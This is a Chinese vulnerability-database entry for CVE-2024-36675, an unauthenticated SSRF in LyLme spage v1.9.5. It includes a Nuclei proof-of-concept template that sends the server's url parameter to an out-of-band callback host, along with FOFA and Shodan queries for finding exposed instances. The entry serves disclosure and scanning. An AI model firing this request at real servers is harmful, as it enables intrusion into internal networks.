漏洞信息
漏洞名称: LyLme spage Server-Side Request Forgery Vulnerability
漏洞编号:
漏洞类型: 服务器端请求伪造
漏洞等级: 高危
漏洞描述: LyLme spage是一款轻量级的网页服务应用,广泛用于个人和小型企业搭建简易网站。其v1.9.5版本存在服务器端请求伪造(SSRF)漏洞,攻击者可以通过apply/index.php文件中的url参数,强制服务器发起任意请求。这种漏洞的根源在于对用户提供的URL参数缺乏充分的验证和过滤,使得攻击者能够利用服务器作为代理,访问内部网络资源或进行其他恶意操作。由于SSRF漏洞允许攻击者绕过网络边界限制,访问通常不可达的内部服务,因此可能导致敏感信息泄露、内部服务攻击等严重后果。此漏洞无需认证即可利用,且可以自动化攻击,增加了其潜在危害性。
产品厂商: lylme
产品名称: lylme_spage
影响版本: 1.9.5
搜索语法: title=”lylme”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/d3a9519c6e9ac22feb01e02546b6b5663245e11e/http%2Fcves%2F2024%2FCVE-2024-36675.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
|
id: CVE-2024-36675
info:
name: LyLme spage v1.9.5 - Server-Side Request Forgery
author: ritikchaddha
severity: high
description: |
LyLme spage v1.9.5 is vulnerable to server-side request forgery (SSRF) via the url parameter in apply/index.php. An attacker can force the server to make arbitrary requests, potentially accessing internal resources.
reference:
- https://github.com/Hebing123/cve/issues/44
- https://nvd.nist.gov/vuln/detail/CVE-2024-36675
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-36675
cwe-id: CWE-918
cpe: cpe:2.3:a:lylme:lylme_spage:1.9.5:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: lylme
product: lylme_spage
fofa-query: title="lylme"
shodan-query: title="lylme"
tags: cve,cve2024,ssrf,lylme,spage,oast
http:
- method: GET
path:
- "{{BaseURL}}/apply/index.php?url=http://{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(interactsh_protocol, "http")'
- 'contains_all(body, "title\":", "icon\":")'
- 'contains(content_type, "application/json")'
condition: and
|